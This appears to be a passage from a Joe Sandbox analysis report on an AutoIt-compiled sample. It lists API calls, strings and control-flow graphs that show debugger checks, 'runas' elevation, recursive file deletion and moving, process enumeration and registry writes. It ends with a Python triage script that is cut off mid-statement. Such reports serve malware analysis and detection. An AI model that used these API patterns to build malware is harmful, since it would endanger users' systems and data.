94186->94187 

                                        Control-flow Graph

                                        control_flow_graph 278 6f5d78-6f5de7 call 6fbf07 GetVersionExW call 6f84b7 283 6f5ded 278->283 284 734f0c-734f1f 278->284 285 6f5def-6f5df1 283->285 286 734f20-734f24 284->286 287 734f4b 285->287 288 6f5df7-6f5e56 call 6f96d9 call 6f79ed 285->288 289 734f27-734f33 286->289 290 734f26 286->290 294 734f52-734f5e 287->294 303 6f5e5c-6f5e5e 288->303 304 7350ad-7350b4 288->304 289->286 291 734f35-734f37 289->291 290->289 291->285 293 734f3d-734f44 291->293 293->284 296 734f46 293->296 297 6f5ecc-6f5ee6 GetCurrentProcess IsWow64Process 294->297 296->287 299 6f5ee8 297->299 300 6f5f45-6f5f4b 297->300 302 6f5eee-6f5efa 299->302 300->302 305 7350f2-7350f6 GetSystemInfo 302->305 306 6f5f00-6f5f0f LoadLibraryA 302->306 307 6f5e64-6f5e67 303->307 308 734fae-734fc1 303->308 309 7350b6 304->309 310 7350d4-7350d7 304->310 313 6f5f4d-6f5f57 GetSystemInfo 306->313 314 6f5f11-6f5f1f GetProcAddress 306->314 307->297 315 6f5e69-6f5eab 307->315 316 734fc3-734fcc 308->316 317 734fea-734fec 308->317 318 7350bc 309->318 311 7350c2-7350ca 310->311 312 7350d9-7350e8 310->312 311->310 312->318 321 7350ea-7350f0 312->321 323 6f5f27-6f5f29 313->323 314->313 322 6f5f21-6f5f25 GetNativeSystemInfo 314->322 315->297 324 6f5ead-6f5eb0 315->324 325 734fd9-734fe5 316->325 326 734fce-734fd4 316->326 319 735021-735024 317->319 320 734fee-735003 317->320 318->311 329 735026-735041 319->329 330 73505f-735062 319->330 327 735010-73501c 320->327 328 735005-73500b 320->328 321->311 322->323 331 6f5f2b-6f5f2c FreeLibrary 323->331 332 6f5f32-6f5f44 323->332 333 734f63-734f6d 324->333 334 6f5eb6-6f5ec0 324->334 325->297 326->297 327->297 328->297 336 735043-735049 329->336 337 73504e-73505a 329->337 330->297 340 735068-73508f 330->340 331->332 338 734f80-734f8a 333->338 339 734f6f-734f7b 333->339 334->294 335 6f5ec6 334->335 335->297 336->297 337->297 341 734f9d-734fa9 338->341 342 734f8c-734f98 338->342 339->297 343 735091-735097 340->343 344 73509c-7350a8 340->344 
341->297 342->297 343->297 344->297
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 006F5DA7
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        • GetCurrentProcess.KERNEL32(?,0078DC2C,00000000,?,?), ref: 006F5ED3
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 006F5EDA
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006F5F05
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006F5F17
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006F5F25
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 006F5F2C
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 006F5F51
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: 5d8ddafde8a715631476c993714eb200a10db8fee3cc28669bef09d678f2ea20
                                        • Instruction ID: dc3fb76b4afa7cf9a2773473ec6d71fe62d22a0c37a0d915190bf298c62aa605
                                        • Opcode Fuzzy Hash: 5d8ddafde8a715631476c993714eb200a10db8fee3cc28669bef09d678f2ea20
                                        • Instruction Fuzzy Hash: 41A1C23281A7C5CFD716CBB87C449A97FA56B26300F18D99CE68193273D22C494ACB3D

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F32EF,?), ref: 006F3342
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F32EF,?), ref: 006F3355
                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F32EF,?), ref: 006F33C1
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                          • Part of subcall function 006F41E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006F33E9,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F4227
                                        • SetCurrentDirectoryW.KERNELBASE(?,00000001,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F3442
                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00733C8A
                                        • SetCurrentDirectoryW.KERNEL32(?,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 00733CCB
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007B31F4,007C2418,?,?,?,?,?,?,?,006F32EF), ref: 00733D54
                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00733D5B
                                          • Part of subcall function 006F345A: GetSysColorBrush.USER32(0000000F), ref: 006F3465
                                          • Part of subcall function 006F345A: LoadCursorW.USER32(00000000,00007F00), ref: 006F3474
                                          • Part of subcall function 006F345A: LoadIconW.USER32(00000063), ref: 006F348A
                                          • Part of subcall function 006F345A: LoadIconW.USER32(000000A4), ref: 006F349C
                                          • Part of subcall function 006F345A: LoadIconW.USER32(000000A2), ref: 006F34AE
                                          • Part of subcall function 006F345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F34C6
                                          • Part of subcall function 006F345A: RegisterClassExW.USER32(?), ref: 006F3517
                                          • Part of subcall function 006F353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F3568
                                          • Part of subcall function 006F353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3589
                                          • Part of subcall function 006F353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F359D
                                          • Part of subcall function 006F353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F35A6
                                          • Part of subcall function 006F38F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006F39C3
                                        Strings
                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00733C84
                                        • 0$|, xrefs: 006F341C
                                        • AutoIt, xrefs: 00733C7F
                                        • runas, xrefs: 00733D4F
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                        • String ID: 0$|$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                        • API String ID: 683915450-569504614
                                        • Opcode ID: 531d998114c3faf5c8cf20014374bae60dca4edceaf8f025ebf00b56052c8edd
                                        • Instruction ID: 31e017f3c849340ad0969de3084bd8063cf421f00633a285d8eea6a2efc162a8
                                        • Opcode Fuzzy Hash: 531d998114c3faf5c8cf20014374bae60dca4edceaf8f025ebf00b56052c8edd
                                        • Instruction Fuzzy Hash: A551FA71148389AED715EF60DC45EBE7BA69F80740F40442CF681522A3CF6C8F4AD76A

                                        Control-flow Graph

                                        control_flow_graph 409 769f9f-769fc7 FindFirstFileW 410 76a03a-76a045 FindClose 409->410 411 769fc9-769fde call 7155c2 409->411 412 76a0e2 410->412 413 76a04b-76a05e FindFirstFileW 410->413 421 769fe0-769ff5 call 7155c2 411->421 422 76a028-76a038 FindNextFileW 411->422 415 76a0e4-76a0e8 412->415 416 76a060-76a066 413->416 417 76a0d9 413->417 420 76a069-76a070 416->420 419 76a0db-76a0dc FindClose 417->419 419->412 423 76a0c7-76a0d7 FindNextFileW 420->423 424 76a072-76a087 call 7155c2 420->424 421->422 429 769ff7-76a020 GetFileAttributesW SetFileAttributesW 421->429 422->410 422->411 423->417 423->420 424->423 432 76a089-76a09e call 7155c2 424->432 430 76a026 429->430 431 76a0eb-76a0f4 FindClose 429->431 430->422 431->415 432->423 435 76a0a0-76a0be SetCurrentDirectoryW call 769f9f 432->435 438 76a0f6-76a0f8 435->438 439 76a0c0-76a0c5 SetCurrentDirectoryW 435->439 438->419 439->423
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,74DE8FB0,?,00000000), ref: 00769FC0
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00769FFE
                                        • SetFileAttributesW.KERNELBASE(?,?), ref: 0076A018
                                        • FindNextFileW.KERNELBASE(00000000,?), ref: 0076A030
                                        • FindClose.KERNEL32(00000000), ref: 0076A03B
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A057
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A0A7
                                        • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A0C5
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A0CF
                                        • FindClose.KERNEL32(00000000), ref: 0076A0DC
                                        • FindClose.KERNEL32(00000000), ref: 0076A0EC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: 867a28f7b63487b5bbdd8648254ef005f6fa0b35998c5032b9d25d2bd8999a4e
                                        • Instruction ID: f161fb8cb4b26ccac351ab051cb15df87516ff69259a8d037348b0b8002c26c3
                                        • Opcode Fuzzy Hash: 867a28f7b63487b5bbdd8648254ef005f6fa0b35998c5032b9d25d2bd8999a4e
                                        • Instruction Fuzzy Hash: 6C31A272640219BBDB24AFB4DC49ADE73ADAF45360F108155E816E20D0EB3CDE84DF65

                                        Control-flow Graph (rendered as an image in the original report, not reproduced here): function beginning at 0x0075D836, basic blocks marked Executed / Not Executed; the graph's imported-API nodes are FindFirstFileW, FindNextFileW, FindClose, MoveFileW and DeleteFileW.
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                          • Part of subcall function 0075E9C5: GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0075D8E2
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0075D99D
                                        • MoveFileW.KERNEL32(?,?), ref: 0075D9B0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0075D9CD
                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0075D9F7
                                          • Part of subcall function 0075DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0075D9DC,?,?), ref: 0075DA72
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0075DA13
                                        • FindClose.KERNEL32(00000000), ref: 0075DA24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        • Opcode ID: add22fb1627436e0981043a78082d18a051cc91bf909589e63c97938871945bc
                                        • Instruction ID: e89e5001e7a16bbeba886b45efe2a54a377cc83c3df1667ba152c7a07b9104e7
                                        • Opcode Fuzzy Hash: add22fb1627436e0981043a78082d18a051cc91bf909589e63c97938871945bc
                                        • Instruction Fuzzy Hash: D5617D3180114DABCF25EBA0DA529FDB7B6AF14301F248069E802B7191EB786F0DCB65
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                          • Part of subcall function 0075E9C5: GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0075DBE0
                                        • DeleteFileW.KERNELBASE(?,?,?,?), ref: 0075DC30
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0075DC41
                                        • FindClose.KERNEL32(00000000), ref: 0075DC58
                                        • FindClose.KERNEL32(00000000), ref: 0075DC61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
                                        • Opcode ID: dc6fd126b503703d326c67a62e90f7aade10a1c58be30040b8c15e932371090b
                                        • Instruction ID: 7f9f212badf4603f8d1ff24617c9208a39033c22dae98800e27cb1afa1423e95
                                        • Opcode Fuzzy Hash: dc6fd126b503703d326c67a62e90f7aade10a1c58be30040b8c15e932371090b
                                        • Instruction Fuzzy Hash: 8E315C310083899BC360EB64D8918EFB7E9BE91301F44591DF9D1921A1EBA4DE0DCB6A
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0075DCC1
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0075DCCF
                                        • Process32NextW.KERNEL32(00000000,?), ref: 0075DCEF
                                        • CloseHandle.KERNELBASE(00000000), ref: 0075DD9C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 354fe8937311f0b141cdc5402c6508d80fac449680163ebfee3fe3716db067d1
                                        • Instruction ID: 4cf528c4fa7b83b8b47ed2f00c1209963396774a6849ff86e5a553a7e8f39854
                                        • Opcode Fuzzy Hash: 354fe8937311f0b141cdc5402c6508d80fac449680163ebfee3fe3716db067d1
                                        • Instruction Fuzzy Hash: D63170711083049FD321EF64D885ABFBBF9AF98350F14092DF681861A1DBB59948CB92
                                        APIs
                                        • lstrlenW.KERNEL32(?,00734686), ref: 0075E397
                                        • GetFileAttributesW.KERNELBASE(?), ref: 0075E3A6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0075E3B7
                                        • FindClose.KERNEL32(00000000), ref: 0075E3C3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 54216e6ce806cccb1100a1d45806c82f450adf8ad1b374195488a46c43d41075
                                        • Instruction ID: 0f2a47c07bb34d8cf373024163b2519e92b95152c3c98611c52538f2640fc8ee
                                        • Opcode Fuzzy Hash: 54216e6ce806cccb1100a1d45806c82f450adf8ad1b374195488a46c43d41075
                                        • Instruction Fuzzy Hash: 18F0A03041192057C2256738AD0D8AA77ACAE41336B208711F835C20F0D7B89E994699
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0071504E,?,007B98D8,0000000C,007151A5,?,00000002,00000000), ref: 00715099
                                        • TerminateProcess.KERNEL32(00000000,?,0071504E,?,007B98D8,0000000C,007151A5,?,00000002,00000000), ref: 007150A0
                                        • ExitProcess.KERNEL32 ref: 007150B2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: f7ab0de0060a7b40a90e3b435b3f63b06e33bd273cbc3542b3b6522279fcb5b7
                                        • Instruction ID: 237c83f2afdc8835deb04776810c837f7ce80c5bfefe018498ff1613a0bb0926
                                        • Opcode Fuzzy Hash: f7ab0de0060a7b40a90e3b435b3f63b06e33bd273cbc3542b3b6522279fcb5b7
                                        • Instruction Fuzzy Hash: DEE0B631450548EFCF256FA8DD0DE983B6AEF89781F118014F8158A5A2DB3DEE82DB94
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 0074E60A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: 46f854ccdb123a5ae9b357bdf5e9a333db651cce5ae2a0dac7b96986f8f1ca57
                                        • Instruction ID: 4465439f3409eba6534c0bf35e674f9ab93dcaf3735dfda2dbc47b102c4705fb
                                        • Opcode Fuzzy Hash: 46f854ccdb123a5ae9b357bdf5e9a333db651cce5ae2a0dac7b96986f8f1ca57
                                        • Instruction Fuzzy Hash: 60D0C9B580111DEACBA0CB90DC88DDD73BCBB04304F104552F506A2040D73895488B10

                                        Control-flow Graph (rendered as an image in the original report, not reproduced here): function beginning at 0x0077CD16, basic blocks marked Executed / Not Executed; the graph's imported-API nodes are RegConnectRegistryW, RegCreateKeyExW, RegSetValueExW and RegCloseKey.
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077CE1C
                                        • RegCreateKeyExW.KERNELBASE(?,?,00000000,0078DCD0,00000000,?,00000000,?,?), ref: 0077CEA3
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0077CF03
                                        • _wcslen.LIBCMT ref: 0077CF53
                                        • _wcslen.LIBCMT ref: 0077CFCE
                                        • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 0077D011
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0077D120
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0077D1AC
                                        • RegCloseKey.KERNELBASE(?), ref: 0077D1E0
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077D1ED
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0077D2BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        • Opcode ID: 49fdf800aa155fe8e74fb5ed85b7feabd31dae76eeb793c1d88b68f6a17d617a
                                        • Instruction ID: 8b844818325acfaa9971f656692734d7c8eb1f659619def27dff23e947824004
                                        • Opcode Fuzzy Hash: 49fdf800aa155fe8e74fb5ed85b7feabd31dae76eeb793c1d88b68f6a17d617a
                                        • Instruction Fuzzy Hash: D91268352042049FDB24DF18C885A2AB7F6FF88754F15849CF99A9B3A2CB35ED41CB85
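The API listings above (the FindFirstFileW/FindNextFileW/DeleteFileW/MoveFileW directory walk, the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW process enumeration, the TerminateProcess/ExitProcess exit path and the RegCreateKeyExW/RegSetValueExW registry writer) are the raw material an analyst turns into behaviour tags. The Python below is an added example, not Joe Sandbox code and not part of the analysed sample: it parses the `APIs` line shape used on this page, keeps `Part of subcall function` entries apart from the function's own calls, decodes the dwType argument of RegSetValueExW (the values 1, 7, 0xB and 3 visible in the listing are REG_SZ, REG_MULTI_SZ, REG_QWORD and REG_BINARY) and applies behaviour rules. The rule names, the `fn@` labels and the trimmed sample listing are this example's own assumptions.

```python
"""Triage helper for the 'APIs' blocks of a Joe Sandbox function listing.

Added example for this page, not Joe Sandbox code and not part of the sample:
it parses the line shape used above; behaviour rules and labels are assumptions.
"""
import re
from collections import namedtuple
from typing import Dict, List, Optional

# "FindFirstFileW.KERNELBASE(?,?), ref: 0075D8E2" or "Part of subcall function 0075E9C5: <same shape>"
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?.*?\bref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
ApiCall = namedtuple("ApiCall", "api module args ref subcall_of")  # subcall_of is None for direct calls
# dwType (4th argument) of RegSetValueExW, per the Windows SDK.
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}
# Assumed rules: a function gets the tag when it calls every listed API directly.
BEHAVIOUR_RULES = {
    "process discovery (Toolhelp32 walk)": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "recursive file delete": {"FindFirstFileW", "FindNextFileW", "DeleteFileW"},
    "recursive file move": {"FindFirstFileW", "FindNextFileW", "MoveFileW"},
    "registry write": {"RegCreateKeyExW", "RegSetValueExW"},
    "self termination": {"TerminateProcess", "ExitProcess"},
}

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)

def parse_listing(text: str) -> List[List[ApiCall]]:
    """Split the listing at 'APIs' headers; a block ends at the next metadata header."""
    functions: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            current = []
            functions.append(current)
        elif line in ("Strings", "Memory Dump Source", "Control-flow Graph"):
            current = None
        elif current is not None:
            call = parse_api_line(line)
            if call:
                current.append(call)
    return [f for f in functions if f]

def direct_apis(calls: List[ApiCall]) -> set:
    return {c.api for c in calls if c.subcall_of is None}

def label(calls: List[ApiCall]) -> str:
    """Lowest direct call site: a stable handle, not the function's entry address."""
    refs = [c.ref for c in calls if c.subcall_of is None]
    return "fn@%08X" % min(refs) if refs else "fn@unknown"

def tag_behaviours(calls: List[ApiCall]) -> List[str]:
    apis = direct_apis(calls)
    return [tag for tag, needed in BEHAVIOUR_RULES.items() if needed <= apis]

def registry_value_types(calls: List[ApiCall]) -> List[str]:
    """Decode dwType of each RegSetValueExW call whose type argument was resolved."""
    return [REG_TYPES.get(int(c.args[3], 16), "type_" + c.args[3]) for c in calls
            if c.api == "RegSetValueExW" and len(c.args) > 3 and c.args[3] != "?"]

def triage(text: str) -> Dict[str, List[str]]:
    """label -> behaviour tags, plus decoded REG_* types for registry writers."""
    return {label(calls): tag_behaviours(calls) + registry_value_types(calls)
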